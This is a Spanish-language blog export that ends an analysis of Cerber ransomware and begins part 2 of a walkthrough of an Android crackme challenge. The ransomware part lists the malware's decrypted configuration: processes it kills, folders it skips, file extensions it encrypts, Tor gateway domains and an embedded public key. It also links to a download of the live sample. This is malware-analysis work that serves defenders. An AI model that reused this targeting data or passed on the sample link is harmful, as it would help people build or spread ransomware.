<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\program files (x86)\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\windows10upgrade\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\program files\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\programdata\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\recovery\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\recycled\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\recycler\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\system volume information\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\temp\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\windows.old\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\appdata\local\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\windows\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\winnt\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">%I64d</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\appdata\locallow\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\appdata\roaming\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\local settings\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\public\music\sample music\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\public\pictures\sample pictures\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\public\videos\sample videos\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\tor browser\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">languages</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+-0123456789.Ee</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">check</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">language</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">close_process</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">close_process</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">process</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">sqbcoreservice.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">agntsvc.exeagntsvc.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">agntsvc.exeencsvc.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ocssd.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">agntsvc.exeisqlplussvc.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">dbeng50.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">dbsnmp.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">fbserver.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">firefoxconfig.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">msftesql.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">mydesktopqos.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">mydesktopservice.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">mysqld-nt.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">mysqld-opt.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">mysqld.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ocautoupds.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ocomm.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">sqlbrowser.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">oracle.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">sqlwriter.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">sqlagent.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">tbirdconfig.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">sqlservr.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.orf</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">synctime.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">p</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">p</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.nyf</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">xfssvccon.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">debug</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">default</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">site_1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">onion.to</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">site_2</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">onion.cab</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">site_3</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">onion.nu</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">site_4</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">onion.link</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">site_5</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">tor2web.org</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">tor</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">p27dokhpz2n7nvgr</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">encrypt</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bytes_skip</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">divider</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">encrypt</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">files</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.123</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.1cd</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.3dm</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.3ds</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.3fr</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.3g2</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.3gp</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.3pr</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.602</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.7z</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.7zip</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.aac</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.ab4</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.abd</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.acc</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.accdb</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.accde</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.accdr</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.accdt</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.ach</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.acr</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.act</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.adb</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.adp</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.ads</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.aes</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.agdl</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.ai</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.aiff</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.ait</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.al</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.aoi</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.apj</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.apk</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.arc</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.arw</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.ascx</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.asf</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.asm</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.asp</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.aspx</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.asset</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.asx</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.atb</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.avi</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.awg</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.back</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.backup</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.backupdb</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.bak</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.bank</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.bat</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.bay</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.bdb</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.bgt</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.bik</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.bin</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.bkp</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.blend</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.bmp</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">................................................</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "Courier New", Courier, monospace; font-size: x-small;">.jpg</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">data_finish</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">file_extension</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\steam\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">files_name</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">_{RAND}_README_</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">run_by_the_end</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">self_deleting</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">statistics</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUF2a3R5NXFocUV5ZFI5MDc2RmV2cAowdU1QN0laTm1zMUFBN0dQUVVUaE1XYllpRVlJaEJLY1QwL253WXJCcTBPZ3Y3OUsxdHRhMDRFSFRyWGdjQXAvCk9KZ0JoejlONThhZXdkNHlaQm0yY29lYURHdmNHUkFjOWU3Mk9iRlEvVE1FL0lvN0xaNXFYRFd6RGFmSThMQTgKSlFtU3owTCsvRytMUFRXZzdrUE9wSlQ3V1NrUmI5VDh3NVFnWlJKdXZ2aEVySE04M2tPM0VMVEgrU29FSTUzcAo0RU5Wd2ZOTkVwT3BucE9PU0tRb2J0SXc1NkNzUUZyaGFjMHNRbE9qZWsvbXVWbHV4amlFbWMwZnN6azJXTFNuCnFyeWlNeXphSTVEV0JEallLWEExdHAyaC95Z2JrWWRGWVJiQUVxd3RMeFQyd01mV1BRSTVPa2hUYTl0WnFEMEgKblFJREFRQUIKLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tCg==</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">background</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">text</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">whitelist</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">folders</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\bitcoin\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\excel\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\microsoft sql server\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\microsoft\powerpoint\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\microsoft\excel\</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">La Public Key</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkSVkN8kFwgXAQ40vIjlSgAYZfIcBoiSsVLy86tAPyc8lZLhGlSVhN7bOuAQxy_JevE2CC0wTa0_looMsX4oDda4bWK63V3QZVXh9U_otoPMe6YU9OdHwdGJYlkItvDxFhcKKiVTRZHm0/s1600/pkey.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkSVkN8kFwgXAQ40vIjlSgAYZfIcBoiSsVLy86tAPyc8lZLhGlSVhN7bOuAQxy_JevE2CC0wTa0_looMsX4oDda4bWK63V3QZVXh9U_otoPMe6YU9OdHwdGJYlkItvDxFhcKKiVTRZHm0/s640/pkey.jpg" width="488" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Les dejo el sample y el dump, tener mucho cuidado!!!!</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://dl.dropboxusercontent.com/u/80008916/cerber-29-12-16.rar</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: #fefdfa; color: #333333; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;">Eso es todo por este 2016 @Dkavalanche </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: #fefdfa; color: #333333; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: #fefdfa; color: #333333; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: #fefdfa; color: #333333; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: #fefdfa; color: #333333; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><br /></span></div>
<b><br /></b>@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com2tag:blogger.com,1999:blog-4220472203730425546.post-63307678009466854232016-12-27T10:15:00.000-08:002017-03-27T18:17:17.623-07:00<b style="background-color: white; color: #444444; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px;">Resolviendo el reto Nro 10 Android de ESET Ekoparty 2016 #eko12 - PARTE 2</b><br />
<b style="background-color: white; color: #444444; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px;"><br /></b><span style="background-color: white; color: #444444;"></span><span style="font-family: "arial" , "helvetica" , sans-serif;"><b style="background-color: white; color: #444444;"><br /></b></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">Como habíamos quedado en la <a href="http://oberheimdmx.blogspot.com.ar/2016/12/resolviendo-el-reto-nro-10-android-de.html">PARTE 1</a> el CrackmeBaby.apk desencripta un nuevo.apk</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="background-color: white;"><span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><b>content.apk </b><span class="Apple-tab-span" style="white-space: pre;"> </span>SHA256:<span class="Apple-tab-span" style="white-space: pre;"> </span>94317deb79ced2ece91b413d142492c76c876a320957a0f21bdf2a8150d6d427</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><span style="font-size: 13px;"><br /></span></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoHjYVPVqKbT5qZlgYtWsvqzLc0ilBWIZKKdbALUtHraGQHFFfmrEusTIkMgEl6XskwrIEleOKPoHd7_TFaD1vZ2ndNqwJbGbLx3NxoMxHs1fnkzn0i43XsLDaPi5DmI40oKSl8n2tAiQ/s1600/02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoHjYVPVqKbT5qZlgYtWsvqzLc0ilBWIZKKdbALUtHraGQHFFfmrEusTIkMgEl6XskwrIEleOKPoHd7_TFaD1vZ2ndNqwJbGbLx3NxoMxHs1fnkzn0i43XsLDaPi5DmI40oKSl8n2tAiQ/s400/02.jpg" width="238" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Arrancamos la APP y nos muestra esta imagen, evidentemente algo mal estamos haciendo.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOe8xpuU8FmMTRqy7g8bofEW5LAnldiZn2FikPEqIQKRK8jdmlaUXCEjE6QYmCkPDFF-JFYUeq15pk-8VazpnoM7FYdbR9-UqrcR3LFNIgwaG8YzTTsMm-MOjh2oIvn4GvzzXm-KlIjSA/s1600/03.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOe8xpuU8FmMTRqy7g8bofEW5LAnldiZn2FikPEqIQKRK8jdmlaUXCEjE6QYmCkPDFF-JFYUeq15pk-8VazpnoM7FYdbR9-UqrcR3LFNIgwaG8YzTTsMm-MOjh2oIvn4GvzzXm-KlIjSA/s400/03.jpg" width="242" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><span style="font-size: 13px;"><br /></span></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">Decompilamos con APK-Multy-tool </span></span><br />
<br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">Existen dos activities </span></span><span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><b>SuperActivity</b> y<b> </b></span><span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><b>SuperbActivity.</b></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">Esto lo vemos en el </span><span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">AndroidManifest.xml</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH9IPrBvXWq9cotb5JhKG8Qj7er_9YIKUN9mGIHF5yyRGcYMmwze_OfKzXTeAybUQrDn0qLWXrhjNbaYGw4MdWGst6VVrK5ygbQDl5AME4E8YOilI9OEw4Qlpny9sAS2nKb02ecA5jIf8/s1600/manifest-orig.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="232" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH9IPrBvXWq9cotb5JhKG8Qj7er_9YIKUN9mGIHF5yyRGcYMmwze_OfKzXTeAybUQrDn0qLWXrhjNbaYGw4MdWGst6VVrK5ygbQDl5AME4E8YOilI9OEw4Qlpny9sAS2nKb02ecA5jIf8/s640/manifest-orig.jpg" width="640" /></a></div>
<br />
<div>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: #444444;">Y la actividad que se esta iniciando por default es </span><span style="color: #444444;">SuperActivity y vemos en el código que solo muestra una imagen (la de Obi Wan)</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTZCk1MHWhsgPSZXuVMQZEd_Gd_sT96espWsYw04zoVS181qSLOTqvYsYHx1a2WPVsMes-ngGON5d9bvXp_KeWot5sK-gbYye4IpevkHp-92DfZlsq76Ci0Ml_wNoc2x_1kTbnfWwBUwY/s1600/Activity.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTZCk1MHWhsgPSZXuVMQZEd_Gd_sT96espWsYw04zoVS181qSLOTqvYsYHx1a2WPVsMes-ngGON5d9bvXp_KeWot5sK-gbYye4IpevkHp-92DfZlsq76Ci0Ml_wNoc2x_1kTbnfWwBUwY/s640/Activity.jpg" width="640" /></a></div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span>
<br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><b>SuperbActivity </b>hace cosas mas interesantes y vemos que nunca arranca por lo que vamos a forzar su arranque</span><br />
<b style="color: #444444; font-family: "Courier New", Courier, monospace; font-size: small;"><br /></b>
<br />
